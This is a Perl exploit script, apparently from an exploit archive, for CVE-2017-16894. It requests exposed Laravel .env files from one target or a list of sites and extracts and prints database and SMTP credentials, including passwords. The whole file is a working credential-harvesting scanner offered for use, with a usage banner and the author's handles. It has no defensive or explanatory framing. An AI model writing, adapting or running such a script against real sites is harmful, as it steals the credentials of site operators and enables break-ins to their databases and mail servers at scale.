#!/usr/bin/perl# [CVE - 2017-16894] - Laravel Enviroment Variables - Read pass

1. #!/usr/bin/perl
2. # [CVE - 2017-16894] - Laravel Enviroment Variables - Read passwords and login credentials
3. # CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16894
4. # POC: http://whiteboyz.xyz/laravel-env-file-vuln.html
5. # Coder by v4p0r 20 NOV 2017
6.  
7. use strict;
8. use warnings;
9. use Getopt::Long;
10. use WWW::Mechanize;
11.  
12. my ($helpzinho);
13. my $banner = @ARGV;
14.  
15. GetOptions( 'list-site|l=s' => \$main::list,
16. 'site|s=s' => \$main::site,
17. 'help|h' => \$helpzinho,
18. );
19.  
20. if ($helpzinho) {
21. &banner;
22. }
23.  
24. print "================================\n" .
25. " # Exploit: EAV EXPLOIT \n" .
26. " # Coder: v4p0r \n" .
27. " # Date: 21 NOV 2017 \n" .
28. "================================\n";
29.  
30.  
31. if ($main::site) {
32.  
33. my $url = $main::site;
34. print $url;
35. my $env = request($url);
36.  
37. if ($env =~ /APP_ENV/){
38.  
39. get_config($env);
40.  
41. exit;
42. } else {
43. print "[NOT VULN]";
44. }
45.  
46.  
47. }
48.  
49. if($banner <= 1){
50.  
51. print "\nCoder: v4p0r\n" .
52. "Team: Yunkers Crew\n" .
53. "Twitter: 0x777null\n".
54. "Skype: drx.priv\n\n" .
55. "Usage: perl $0 --help\n";
56.  
57. exit;
58. }
59.  
60. open (my $web,'<',$main::list) || die "\n [Lista nao selecionada]";
61. my @sites = <$web>;
62.  
63. foreach my $url(@sites) {
64.  
65. print "\n[SITE]: ".$url."";
66. my $env = request($url);
67.  
68. if ($env =~ /APP_ENV/){
69.  
70. get_config($env);
71.  
72. } else {
73. print "[NOT VULN]";
74. }
75.  
76.  
77. }
78.  
79.  
80. sub request {
81.  
82. my $url = shift;
83. $url = 'http://'.$url if $url !~/^https?:\/\//;
84.  
85. my $req = WWW::Mechanize->new( agent => 'Mozilla 5.0' );
86. $req->timeout(3);
87. $req->max_size(1024000);
88. $req->protocols_allowed( [ 'http', 'https'] );
89.  
90. $req->get($url);
91. my $brabo = $req->content;
92. return $brabo;
93.  
94. }
95.  
96. sub get_config {
97.  
98. my $env = shift;
99.  
100. print "\n[DATABASE CONFIG]\n\n";
101. my @dbc = $env =~ /DB_CONNECTION=(.*)/;
102. my @dbh = $env =~ /DB_HOST=(.*)/;
103. my @dbp = $env =~ /DB_PORT=(.*)/;
104. my @dbd = $env =~ /DB_DATABASE=(.*)/;
105. my @dbu = $env =~ /DB_USERNAME=(.*)/;
106. my @dbpwd = $env =~ /DB_PASSWORD=(.*)/;
107.  
108. print "[DB_CONNECTION]: " . ($dbc[0] // 'Nothing') . "\n";
109. print "[DB_HOST]: " . ($dbh[0] // 'Nothing') . "\n";
110. print "[DB_PORT]: " . ($dbp[0] // 'Nothing') . "\n";
111. print "[DB_DATABASE]: " . ($dbd[0] // 'Nothing') . "\n";
112. print "[DB_USERNAME]: " . ($dbu[0] // 'Nothing') . "\n";
113. print "[DB_PASSWORD]: " . ($dbpwd[0] // 'Nothing') . "\n";
114.  
115. # GET SMTP CONFIG
116. print "\n[SMTP CONFIG]\n\n";
117. my @md = $env =~ /MAIL_DRIVER=(.*)/;
118. my @mh = $env =~ /MAIL_HOST=(.*)/;
119. my @mp = $env =~ /MAIL_PORT=(.*)/;
120. my @mfn = $env =~ /MAIL_FROM_NAME=(.*)/;
121. my @mfe = $env =~ /MAIL_FROM_EMAIL=(.*)/;
122. my @mu = $env =~ /MAIL_USERNAME=(.*)/;
123. my @mpwd = $env =~ /MAIL_PASSWORD=(.*)/;
124. my @me = $env =~ /MAIL_ENCRYPTION=(.*)/;
125.  
126. print "[MAIL_DRIVER]: " . ($md[0] // 'Nothing') . "\n";
127. print "[MAIL_HOST]: " . ($mh[0] // 'Nothing') . "\n";
128. print "[MAIL_PORT]: " . ($mp[0] // 'Nothing') . "\n";
129. print "[MAIL_FROM_NAME]: " . ($mfn[0] // 'Nothing') . "\n";
130. print "[MAIL_FROM_EMAIL]: " . ($mfe[0] // 'Nothing') . "\n";
131. print "[MAIL_USERNAME]: " . ($mu[0] // 'Nothing') . "\n";
132. print "[MAIL_PASSWORD]: " . ($mpwd[0] // 'Nothing') . "\n";
133. print "[MAIL_ENCRYPTION]: " . ($me[0] // 'Nothing') . "\n";
134. }
135.  
136. sub banner {
137.  
138. print "\nUsage: $0 <comando>\n".
139. "[+] Comandos:\n".
140. "--help [Ajuda com os comandos]\n".
141. "--list-site|l [Seleciona sua lista de sites]\n".
142. "--site|s [Unico alvo]\n".
143. "[!] Exemplos:\n".
144. "perl $0 -l sites.txt\n".
145. "perl $0 -s http://localhost/.env\n";
146. exit;
147.  
148. }